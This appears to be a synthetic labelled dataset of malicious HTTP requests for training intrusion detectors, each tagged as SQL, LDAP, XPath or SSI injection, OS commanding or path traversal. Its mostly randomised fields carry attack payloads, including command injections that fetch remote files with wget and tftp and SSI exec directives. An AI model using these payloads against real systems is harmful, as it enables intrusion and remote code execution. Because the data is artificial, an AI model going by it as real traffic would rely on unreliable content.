GET /lOqoyiuQefhtt/aaaIuh5eni0dsDd/6yisi/uninensidev/Ed.uxwindow.opene_vZJ@/actq3eosnme/@P9dx48t2EJ/e375kdv2Gc5Ur@61G0FM/e2Sm7UoaOhsFahevaiym/stutrRAo4/doAg7shiEod/3ymaedtsiqjiirootJu.mdb?iosos6yn7jsvmg=efL3tfR7TCW7&59saQhHpo=Ny&otrrfm=%29%28%7C+%28++++cn%3D*o+++%27brien*+++%29%28mail++%3D*o%27brien*+++%29++++&nkh0eihiret=myrpO7N5&artbkuh0=80351&YconnectIHB=8hesrevUneif9i&oJ=4401893&eq=rQvhoajeg&nuoaOa4easpy=erah5shcat&e5xdiccror0r=5035&Nnnnowjs=mlSU-VJ6kgM&o1roaeemmdeT6=326364757&ora=tsk&afnsh=ji&oro=ele%3Ad0cjynnoylibfe HTTP/1.1
Host: 215.147.144.217
Connection: o9frtpd
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 239.52.8.232
Cookie: sdiarlygarophic=NeT;hOg2ceo4f=anm2oio;otIb5mtu= dbgsoundft;tm3dscc=i6tm3sxo;ata=qs
Cookie2: $Version="40"
Date: Tue, 15 Jan 08 22:17:00 GMT
ETag: W/"RooiUzARMje8u.cqCJgI"
Expect: 100-continue
From: Nrt0ttsL@rnpbsgro.fr
If-Modified-Since: Fri, 18 Mar 05 23:59:33 CET
If-Unmodified-Since: Sat, 28 Jul 07 06:14:27 UTC
If-Match: "RkFGcU.C@_W9IEaAfrm"
If-None-Match: "96hepxWdtqgSOw8Agg"
If-Range: Sun, 30 Oct 05 07:15:52 UTC
Max-Forwards: 7006
MIME-Version: 3.1
Pragma: hlne=hai
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: rRhs oinhlhyd=cAeumv
Range: 89831-,-364983
Referer: /lNtottd/emih/olhnuaj.txt
TE: gzip;q=0.5,gzip;q=0.3
Trailer: User-Agent
User-Agent: e1ybaeI/7.3.5
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: 7.3 3.128.75.251
Transfer-Encoding: deflate
Upgrade: oorig/6.0, osraet/4.0
Warning: 212 www.fksOim.jpeg "e4IlyYStHnzI69Ure" "Sun, 09 Sep 07 14:33:28 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38796
Start - Id: 38917
class: LdapInjection
GET /D4TdeleteAorGwKRpbin7/thaiinaone1a/s0y8Zg2dI5r7GIGhO/wnK3TifHi.4f0yF/rX.php?noaamn6eehg=76305064&to=zVgGxDR&wdlofTrtdN2nfm6=I%24o&olfBoni=718310851&Mht7fasascorln=ra5Es&tymailb_passwdPp09=uOEhIqwp64z&HVsF=e06Ibc&7qlmdtaX=eFa&rtveu8i=lGdOJhcG74&ya=Kuxeaeiq-tiinxp_de&iinxOd=90912214&eb3SE4rtdtnC=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.tHhizoDO2.st
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1251
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=90431
Client-ip: 200.72.166.1
Cookie: eQarnncweoo=tztnlogvslhssdSy;tT=276886
Cookie2: $Version="45"
Date: Wed, 22 Apr 09 09:49:38 GMT
ETag: W/"9LE17vqhoeAGtK2Z96N"
Expect: 100-continue
From: g0ftcpby@2esla.fr
If-Modified-Since: Fri, 22 Feb 08 17:29:51 GMT
If-Unmodified-Since: Wed, 18 Jan 06 21:07:27 GMT
If-Match: *
If-None-Match: "mxpBaSZlNMBvj9Xhe8h@"
If-Range: "rMCEEPNZJUo41oqT0GgM"
Max-Forwards: 25
MIME-Version: 7.2
Pragma: rqnet=n2rk
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: ni6tio ogto9ix=ashae
Range: -80225,-8,-43269
Referer: /q0iocdo.bin
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 4.7; tn-cy; rv:5.4.2) Gecko/97109807
UA-Disp: 518,9521,8
UA-OS: Win95
UA-Pixels: 1628x672
Via: 6.7 113.233.112.39:36875, FTP/1.4 www.fcercqe.css
Transfer-Encoding: gzip
Upgrade: toues/6.2, Lrne/8.5, oec5E/9.4, eyhe/5.1, eneaoo/3.9
Warning: 695 www.5pter.js "oYstrefhsreaowhenept" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38917
Start - Id: 39182
class: SSI
PUT /DYHX/txno8/d@/B@_/B_FyYlp/BmTbyaienkyerrsn3r/i5As4rhegElh2orto/eFNqlg8m4fBx..jpg? HTTP/1.0
Content-Length: 493
Content-Language: nwahij,team1aef,ltnt
Content-Encoding: deflate
Content-Location: http://Ahgn.fr/4rk4/trow/1s8oe4a/pthi.jpg
Content-MD5: aXJhbnk3b2FzbHNlbTFvaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Nov 05 22:51:56 UTC
Last-Modified: Fri, 07 Jul 06 05:59:18 GMT
Host: www.riaebhbpel.com:4
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: cp-936;q=0.7, iso-8859-5;q=0.4, koi8-r, x-mac-chinesetrad;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 14.74.123.168
Cookie: eeuxehthnifl=hIfskhgn;idGHoUeU=stSahtaccesYchreplacent;5B11.=ema
Cookie2: $Version="261"
Date: Sat, 18 Oct 08 05:54:55 UTC
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
From: usoekn@3fnpm.it
If-Modified-Since: Sun, 27 Jan 08 07:38:27 GMT
If-Unmodified-Since: Mon, 20 Nov 06 22:22:52 GMT
If-Match: "0O28l0PxkqucuFPD"
If-None-Match: *
If-Range: Mon, 19 Dec 05 02:18:24 GMT
Max-Forwards: 19
MIME-Version: 4.8
Pragma: gelaM='toifs'
Proxy-Authorization: Basic cnNlaW9yOjFzc2U=
Authorization: Basic ZUlySURkaTpzYXNvbQ==
Range: -4,-09852,71-
Referer: /6ae0e/ru6g/twhez1n.mdb
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: ksmietc (iYfMzp@aI; iFUhahP4; thaDEUqXa2; fTL.@G6CE)
UA-Disp: 631,569,16
UA-Color: color8
UA-Pixels: 466x9263
Via: 6.1 146.14.85.104, HTTP/0.2 www.7em6i.png, 7.6 www.ets5i.gif
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Serial-Number: 2274804334681
~~~~~: ~~~~~~~~~~

ti4m=8135833&wr=7646&kuampto=t T&qXTbDew6P2t=3&dthesaruto7sny=es$+r~a3 nullntoascriptl&W@mDdropex_3-Z=5JZqA2G9&u9lchs6ibo1t=67&teisxnneetrdaez=<!--#email fromhost="www.jIntcns.com" tohost="mailbox.rahcm.com" message="pt9i2 shrtwe LmcYu eS9" fromaddress="any7a.com" toaddress="pehu.s5chi.com" subject="ra" sender="Raa.com" replyto="olsot7e.com" cc="ae" inreplyto="mR wOd s" id="xdqmail" -->&dsvopsxOke=l44O7Hppj-9M

End - Id: 39182
Start - Id: 42687
class: SqlInjection
PUT /eee6reG7ioxtNedrdt/GWZformXzHYS/eexaytn/nI1HJHdd-bASunk9Fg5/ZSzUs7Xq_jOF0Qi/stdinIR/lBnr7aanhs8Itsdlcd/%uoLrtLU@7m17iRl/alcttteztipete7s/bnrnswoia2d8/pnxnlaSr9nniinsrrAot/Veh2vcpth.bin? HTTP/1.0
Content-Length: 242
Content-Language: Cgd,aisb,teznq
Content-Encoding: gzip
Content-Location: /tieqeOdh/lmzj/nluE.asmx
Content-MD5: aWVhaUVzdThnZVpoYmVzaA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 06 Nov 07 03:40:48 GMT
Host: www.epqsEe.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: OR '8omh9ebg' LIKE   'Sim%'
Accept-Language: 'select   customer_phone '||'from     customers    '||'where  customer_surname='''||     lv_surname||'''   and customer_type=1';
Cache-Control: no-store
Client-ip: 88.209.41.196
Date: Sat, 20 Sep 08 17:27:00 UTC
Expect: 2rerajnn=llDcy0Nh
If-Modified-Since: Thu, 16 Dec 04 15:30:44 UTC
If-Unmodified-Since: Wed, 17 Aug 05 02:44:50 GMT
If-None-Match: "4TUr5ZZ2oVrjECKhztvO"
If-Range: Wed, 21 Nov 07 10:03:55 UTC
Max-Forwards: 52
Pragma: no-cache
Proxy-Authorization: Basic QW1ldm46dWF0dHI=
Authorization: Basic dG52T0k6aTRzbGVtbnQ=
Referer: http://www.a0tfkotI.cz/fpanvWd/hZwemem/4b3qaZh.jsp
TE: gzip,trailers,trailers
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 0.2; to-tj; rv:7.1.5) Gecko/45182348
Via: HTTP/3.5 222.117.162.130, HTTP/4.5 115.176.29.208
Transfer-Encoding: deflate
Upgrade: aungB/9.6, csrh/5.1, dowc/2.0, ascmsp/5.9, 6jHua/3.4

etenen1iiIdh=0Y5jSCePsX&egsn3momeeriutd=6&sgtx4as70aeda=r|t]input&aawahoitRk=emsnil3jdan&he=$3hogAiskeh/&owisOp=2&eL=xJ7y@U4CR9g3&cnhxnT=nnrawhue4Jrhiyan&eseictmOjpa=tWH&8cwrlhrsd=>dE8e nadsdi &fFmcr7mnla=871397&kel=ot&hi=15419756

End - Id: 42687
Start - Id: 36695
class: OsCommanding
PUT /hoI_3/a8wW/tlrpe1pgaoTme.pl? HTTP/1.1
Content-Length: 284
Content-Language: et,qNa
Content-Encoding: compress
Content-Location: http://www.nctetbee.de/HrUtd.png
Content-MD5: SWVhcGN5Ymw0NGFodGllZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 May 07 24:38:47 CET
Last-Modified: Mon, 18 Dec 06 04:54:18 CET
Host: 233.84.212.12
Connection: osehr
Accept: application/*, image/*, image/png;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Client-ip: 83.189.215.58
Cookie: its=2eiyaasF7oe;ncuO4ahqzLUz_=13395375;yYyic7enw=cSBIGAS.9_;yrekIaxae=mV3m9-
Cookie2: $Version="30"
Date: Mon, 17 Sep 07 07:02:34 UTC
From: debomi@hLAy.be
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: Tue, 06 Apr 04 09:26:19 UTC
Max-Forwards: 9355
MIME-Version: 8.8
Authorization: m8d4 ltrie=btrlliai
Range: 6660-
Referer: http://www.oOpii.be/l8az6ll.htm
TE: trailers
User-Agent: oFSyya http://www.w8ieenoa.net
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: FTP/4.3 www.nfed.jpeg, 0.4 207.157.93.68, 6.6 221.107.236.159
Transfer-Encoding: identity
Upgrade: rqbee/8.8
X-Forwarded-For: 123.125.191.125
----: -------------------------

pia6meia=x;jsgxp_bnph-8nAh5iauniona&9f12Pt@.=mail sead@ihli.rreshd.gov  <<    /tmp/wu.c;&vDaai2je1eitao=eiE~ da o&lenato1daTrle6=r&ta=((i-r6oh&metatnr6hZpC=n'nla:+t te+&VVJU.z=oqu&q-QhtpassoR4F=6011&HeconincnnD=\)aI;s8l&FJkhkbn9Tlog=st3akaalmeb8uSdcm

End - Id: 36695
Start - Id: 48801
class: XPathInjection
GET /rzmiktaeriekhNvo/iNeooeoe4/weeoeskttojrbvelrag/dho/dcux5m/9a7Ker4eY/tethteoyhagfenshp4se/a1refZp9/xqa5nir7ybriih9dnei/iotlsuOeIi.htm?5Qi-=lecho&eeN=aae9eyheU5a%2Bs&pesude=%28i+++++%3C++++count%28oiheCa%2Fchild%3A%3Atext%28%29%29++++and++++j+%3C+++count%28wt%2Fchild%3A%3Acomment%28%29%29+++and++k++%3C++++count%28pnlci%2Fchild%3A%3A*%29++%29&8adYQZ=e4%27&hed0s=z&insertshutdownjpsg3adminC4g=e8Sr&mO=aT-OM_ACDds&cwnrJsnt9esene=008&ochTneihi2=rnsetha8aA%7Cqtor HTTP/1.1
Host: www.nmoeHl.de:73350
Connection: keep-alive
Accept: application/*;q=0.4, application/*;q=0.5, audio/x-wav
Accept-Charset: us-ascii, windows-1250, iso-8859-2, utf-7;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 15.151.104.240
Cookie: re=tajc4;CzteNietiv3bsen=4771705
Cookie2: $Version="875"
Date: Sat, 03 Dec 05 23:26:51 CET
ETag: W/".EXNWZ0xRZ8f9BV"
Expect: 100-continue
From: aTnmcfs@so3eotuens.gov
If-Modified-Since: Wed, 31 Mar 10 04:19:28 GMT
If-Unmodified-Since: Tue, 08 Sep 09 13:43:45 CET
If-Match: "QTaeMLLAfPmBpNJvNm"
If-None-Match: *
If-Range: Wed, 11 Jul 07 11:59:00 CET
Max-Forwards: 0211
MIME-Version: 5.2
Pragma: lorn1='aeta5a'
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: Digest nonce
Range: -77394
Referer: http://www.xpIeo7h.com/luEKrriw/hnsctoa.asmx
TE: trailers,deflate;q=0.5
Trailer: If-Match
User-Agent: Mozilla/2.1 (Windows; U; WinNT 3.2; tt-ec; rv:9.1.1) Gecko/50607882
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 807x856
Via: HTTP/2.1 www.tsttIrr.htm, 2.7 113.189.150.76
Transfer-Encoding: compress
Upgrade: Abotid/5.1, aaihiE/4.1, eennhd/8.8, 4euri/4.1, ssnsa6/5.8
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48801
Start - Id: 39020
class: LdapInjection
PUT /5TaA2p/qNm6.ybj/WNOITV2OBXQg/ebTphfbaejHRg/anrf6tgKkWr.6/S.Gvv4t2accept..css? HTTP/1.1
Content-Length: 41
Content-Language: tIueR
Content-Encoding: identity
Content-Location: /thWcmtb/swgh.jpg
Content-MD5: bmdzZWN1c25lZWllNXNpMw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Nov 09 14:43:55 CET
Last-Modified: Tue, 24 Apr 07 12:33:25 GMT
Host: www.gTsog.net
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: )   (|(uIat=wr*)
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 139.202.31.208
Cookie: 2cImcmmtei9=lL-ZhZbP;lhK=aaui5;0msBenleheP=eUAokCKbAPN;lnRTEqh=nnieyir4eu;3i5lyelhe=258857;webnwer=nSHIMe7m$t7oi7
Cookie2: $Version="997"
Date: Sun, 17 Sep 06 13:55:01 CET
ETag: "_amSqjkXZhP962hMUm13"
Expect: eonor=sctyc;onuAfaf=e4peomal
From: rtYnihG@mn4eem.gov
If-Modified-Since: Mon, 03 Jan 05 22:04:05 UTC
If-Unmodified-Since: Wed, 20 Jun 07 20:58:41 GMT
If-Match: "Zg44Z2A.QOrP0I8b"
If-None-Match: "kQR6jtZ3hFIXhJB"
If-Range: *
Max-Forwards: 329
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Basic bHNlcG06Z3Nob2V6bmM=
Authorization: NTLM OWhpc2VnaG9hdmROcjZhbmxqdG5hZ2FzbkhyMG84dGh0ZnBl
Range: -085
Referer: /zdrekhar/lpeee9Hi.ace
TE: chunked,chunked
Trailer: User-Agent
User-Agent: p6tDe2taberstsssrHh
UA-CPU: 68000
UA-Disp: 744,650,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 960x5747
Via: 7.2 104.77.245.30
Transfer-Encoding: identity
Upgrade: yuanig/5.9, tImh/5.1
Warning: 562 166.100.218.31 "elnelas" "Mon, 19 Dec 05 03:33:45 UTC"
X-Forwarded-For: 145.87.92.159
X-Serial-Number: 13381334
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

3sqxmNe0ceec=804483&mylrncihanvum=4762215

End - Id: 39020
Start - Id: 44625
class: OsCommanding
GET /tKtr/nie62grp/sjUK/iasohk7hxft0nra/3isicaeeCogdhtizEis/hHB073CUV.tiff?Rvmn=onode&6tkyt=df7zUpvFTC&ngphpatbdfc=e%25&ewLseataepe2akn=5aw%27qwiframeeaGe-b&seau3=lpidGgfRetaje&rrrbesgdr=184.62.22.223+++%7C++tftp+192.168.10.33+evil.txt&yAr8EeaneetgOiw=eQasbxoouesmoeQ HTTP/1.1
Host: www.hhett.org
Connection: close
Accept: application/postscript;q=0.0, image/gif, application/zip
Accept-Charset: hz-gb-2312;q=0.4, x-mac-hebrew, koi8, euc-jp;q=0.8
Accept-Encoding: 
Accept-Language: ib-Sxcs;q=0.9, e76-eert;q=0.2, gmp-24Zdii, s02n-lsEGd, d1giraeE-1umhqe
Cache-Control: no-store
Date: Mon, 08 May 06 24:44:49 CET
If-Match: *
Max-Forwards: 51
Authorization: ahmht tcowie=sjrtrsc
Referer: http://www.hcwideem.fr/ddUcuD/fxnc/tstlnha/isgd/bonrru.jpeg
User-Agent: Mozilla/6.5 (X11; U; Unix 4.9; el-sf; rv:7.4.5) Gecko/00321766
Via: FTP/9.7 www.Ta0H.html, 1e9/0.4 www.lehhi.shtml
Warning: 023 197.41.108.229 "toinahck37Ae2tnmttt" 

null

End - Id: 44625
Start - Id: 43802
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.0
Host: 112.75.1.147
Connection: 3lta
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.7, euc-kr;q=0.4, cp-936;q=0.6, utf-7;q=0.6
Accept-Encoding: 
Accept-Language: n-hEtC, by2f-a
Cache-Control: max-stale
Client-ip: 69.5.212.169
Cookie: arjat=fromighttp;oq8rude=wN5D7yB;Tj0p=ouziigrtnufde;@W0OnexecG5aR=7niHtls;wpsJuR=36159532;XAYEkK.gphp=Tlr t
Cookie2: $Version="375"
Date: Sat, 12 Mar 05 09:48:03 GMT
ETag: "4oKNvrNCIHYKhCU0chJP"
Expect: dhegnagd=62iivlh3;nnyeyrs=kyKh
From: qto7read@r8owxth.de
If-Modified-Since: Sat, 09 Dec 06 22:34:46 GMT
If-Unmodified-Since: Mon, 14 Mar 05 17:39:49 CET
If-Match: "8@r_AQfDCuJ2X.R8Y"
If-None-Match: *
If-Range: Wed, 01 Apr 09 22:30:39 GMT
Max-Forwards: 75
MIME-Version: 0.3
Pragma: tzi=teAce
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: qutgt3 dhItvrl=r0cr5f
Range: 904036-,02113-35,44499-
Referer: http://www.A6cs4d.st/rorpuxhc/tipra/htno.php4
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.8 (Windows; U; Windows NT 3.9; ne-bo; rv:9.2.9) Gecko/02562984
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: FTP/0.9 46.63.122.3:505, 6.9 81.99.54.253:659
Transfer-Encoding: deflate
Upgrade: Rteoa/6.1, seif/8.2, nnyoe1/3.7, ai7g/8.2
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43802
Start - Id: 45157
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: 120.223.102.83:18
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-7;q=0.4, windows-1250;q=0.0, windows-1257;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 168.50.166.68
Cookie: 7ncvgmO-T=60479252
Cookie2: $Version="70"
Date: Tue, 22 Jan 08 23:59:44 UTC
ETag: "_qRY_JiOXdS5x61GCrr"
Expect: 7Eepf5
From: hdOf9re@eutwEh.uk
If-Modified-Since: Fri, 30 Jul 04 17:35:22 CET
If-Unmodified-Since: Sun, 13 Jul 08 18:52:16 UTC
If-Match: "R8jeAAwLGcjhdVU"
If-None-Match: *
If-Range: Mon, 02 Oct 06 16:27:43 CET
Max-Forwards: 1069
MIME-Version: 3.0
Pragma: o5gyr='ktr'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: NTLM Nm9uZ3pybHUyYWZwOXJvQWtPaTdrcmdzb2ZlYTJ1ZDdENEN0ag==
Referer: /efoa9ETh/6iset/ooLxltc.exe
TE: gzip;q=0.0
Trailer: Date
User-Agent: eo2e (gGL8nlN; 4rYDrB; cmw-5Ns; tb0CTf; 3@GDJc)
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Pixels: 1177x8327
Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: compress
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 845 www.yohtvu.htm:3657 "hi7s4a" 
X-Forwarded-For: 249.70.128.210
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45157
Start - Id: 43331
class: OsCommanding
GET /@iwfqSyX/b09K/j1trnt/LshO91/3eg/a6fhPA5R@QWr.jNW-e/ArsyaacTnqre.shtml?et=c1Ae&m6t9dpeare=amvXipsDahdooeo6&ansTusef0wOe=vng&a1etunsiltth9hm=226519356&d51wo1UF.0=d4ascea612zbude&eagtt=74421309&hd31=%22%3B++++%2Fusr%2Fbin%2Fwget+www.icolicliteon.com%2Fintatr+++%3B&thataeall=radaljcnsarr&Aahshohtzt=Si%40c&eh1eNncet=51 HTTP/1.0
Host: 2.210.253.151
Connection: keep-alive
Accept: video/*;q=0.5
Accept-Charset: x-mac-hebrew, x-mac-hebrew;q=0.1, windows-1258;q=0.2, iso-8859-1;q=0.2, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: MlsGnoSl-oshmiabe
Cache-Control: no-store
Client-ip: 72.77.48.25
Cookie: leaXEn=-7;SfasooVhriel=frtcoOErh5radmeo;ievr=755535
Cookie2: $Version="947"
Date: Wed, 10 Nov 04 20:45:00 UTC
ETag: "21fLlo7mOtYun2Bj1tw"
Expect: 100-continue
From: aDiswue@0eroLdeg.uk
If-Modified-Since: Mon, 25 Oct 04 08:33:40 GMT
If-Unmodified-Since: Tue, 11 Mar 08 20:53:38 GMT
If-Match: "84OTa2RbRvVkZ4Pzv"
If-None-Match: "DWw.YUKULzc6nWyb"
If-Range: Thu, 03 May 07 08:33:34 CET
Max-Forwards: 16
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM Y05pc3B3bmVpa3dlclBhOGFubWxlY296cmlkbmdTaWFyeWVjeWlp
Authorization: Digest response="3A0571bDBf28ccff2F26aC8b19bAAC90"
Range: -3
Referer: http://www.9has.ch/sedirhr/aeti/iyls/36t4zdir.php3
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/9.2 (compatible; Konqueror/0.4; Linux i386; 7to5; enUmevltxE; gA1s6i6ccs)
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 105x8065
Via: 2.7 234.49.214.176, 8.2 www.vir8g.css
Transfer-Encoding: deflate
Upgrade: EC4/0.8, cEeq/4.6, ezga1/4.0, sop/3.8, d63oen/6.6
Warning: 736 www.zmeftdme.shtml:69 "oNaciecieersUyiosal" 
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 356926769417178111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43331
Start - Id: 36834
class: OsCommanding
GET /tWoS/dp7ve7afcateet/BZlbYY6tmp0C/a@h/5Je1jXmnSWcmJVUg7E-b/coa/dtt6fwuheytinhu/8ity3hder4stenEneetr.tiff?egtlEtl=9irbyawp-avLt%3DasCagnevalo&M@O1=rpBntzPU0&uodsetei=0%7CRs&or3el=xtktmpeer%5Dl&wFen=16&OurfiVtAS=%2Bt&jene3r6cso=copy2nrcprzl%40yrmneet-Eevalit&eC2wtSdEt=772616&ennVeeDeeic=h%3Edi-shutdown&10wM=01960&Sf7=tteuntmpnsy2or5&e8mttYnnree=oxMrX5&yv8uFgba6_cat=tftp+-c+++get+++50.47.129.42%3A%2Fesnindni%2Fveet.exe%7C&tEaAU9me6i3Q=54019748&oexlzoeoocnlC=s8ccumochagtderm%3Ath8satg HTTP/1.1
Host: www.DTssstcs.it
Connection: EferxmtM
Accept: image/gif, text/*, application/rtf;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7
Cookie: 1rEtn7ths5iaus=9370495;havieiemSweu=8oogsdEi4igzs7n;r0mria5ax=87860;drrs=9
Date: Sun, 13 Jul 08 21:38:05 CET
Expect: 100-continue
If-None-Match: "iy2BG3BWGNHuOqn4p6hP"
If-Range: *
Max-Forwards: 0
Authorization: Digest qop=Otog8M
Referer: /booRi/nntn/oPieBd/oxtmos.tar.gz
User-Agent: opltynam/3.9.1
Via: ohUtH/6.9 www.slqc.jpg, HTTP/3.1 192.179.242.241

null

End - Id: 36834
Start - Id: 39923
class: SSI
PUT /ecf/Nrq/4a67hEReue/rDTe0_GcthAe3LtR/3ig0xEN3AkiR/rnI8CwWH/gEJ3L_@b8Iw2IruOk8P-/9mX0Hzlo0L2FPstylei.shtml? HTTP/1.1
Content-Length: 297
Content-Language: go
Content-Encoding: compress
Content-Location: http://t7Gqbc.ch/Qlft/idN9/81oe/ewiz/ohto8t4f.msf
Content-MD5: NkFNSW9rdWFoeWVvZ29FdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Feb 07 01:48:11 GMT
Last-Modified: Fri, 04 Apr 08 22:24:54 UTC
Host: 218.89.127.127
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-874, shift_jis, euc-kr, cp-950, iso-2022-jp;q=0.6
Accept-Encoding: identity, deflate;q=0.5, compress;q=0.6
Accept-Language: *
Cache-Control: min-fresh=906
Client-ip: 239.36.31.16
Cookie: al=4
Cookie2: $Version="25"
Date: Tue, 05 May 09 19:58:20 UTC
ETag: "oFCCtwKdqig7svS9H"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Sun, 16 Jan 05 15:41:18 CET
If-Unmodified-Since: Thu, 09 Jul 09 03:29:13 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 11
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: http://vhiray.st/o2t6haut/uwntswct/Hvsrkie/mtnFafe/gohPee6.dll
TE: trailers,gzip;q=0.4,trailers
Trailer: Trailer
User-Agent: Mozilla/2.1 (Windows; U; Win 9x 5.8; hi-sg; rv:7.0.8) Gecko/02451912
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: FreeBSD
UA-Color: color16
Via: 3.8 www.hsNlTas.png, 5.6 11.43.48.63:41, aoAdz/3.0 www.atji.jpeg:6939
Transfer-Encoding: compress
Upgrade: yceeTa/2.9, mto91/8.2
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tn=cttsnslhhbsisrsnua&eetltthlpfdziae=<!    #<!--    #exec  cmd="id"-->&nRhte7Tetenib=et>wchboHloewa@&psuyerd=0te]&afh5=echoO sservices&1MJq1group bytmpywr=t@g-7&e4mel=f7 4&xihcnteadndnajl=/3ncwvhttpsepqeyse&huejfazk2=6Asctihe&m9fhepe=69067246&7UwzpaIiehuysen=4364198

End - Id: 39923
Start - Id: 40268
class: SSI
GET /w6vQnZCt40g/eVYLK/mlpzh1tit3dAhete7ejy/nVyPI5-oL/eoa/t6TeaSbni.bin?--9VvEfOc-N=siEEkXpwDA0&bettrseread=++childti3e9nrawA%3F-&hoitjenea9=%3C%21--++++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5CqntIrsntiT%5Coheh%5Cn0g.exe+d%3A%5Cin5hr3%5Cwww.atro.org%5CkiRite%5Cdatabase.mdb++%2Fx+++++exporttofoxpro%22--%3E&ckta=e%5Cgzj&vgihtTd=sndocumenth&d2olo0teitssi=5&7juntHom3nurVp=8&tpa3h0eleth=n%3E%7Er&8hu=aPeewotoulteE1&%uMTFbDE=0EG5oe3melmgea HTTP/1.0
Host: www.ooDewgi.biz:80
Connection: Manu
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 140.72.125.191
Cookie: ioh9cprxe=555447;atr=vrsB9kyi6ijnntt
Cookie2: $Version="14"
Date: Tue, 28 Aug 07 16:27:23 CET
ETag: W/"8XJ3NacQ1B7dNW_J182z"
Expect: 100-continue
From: sinl@n3biht.ch
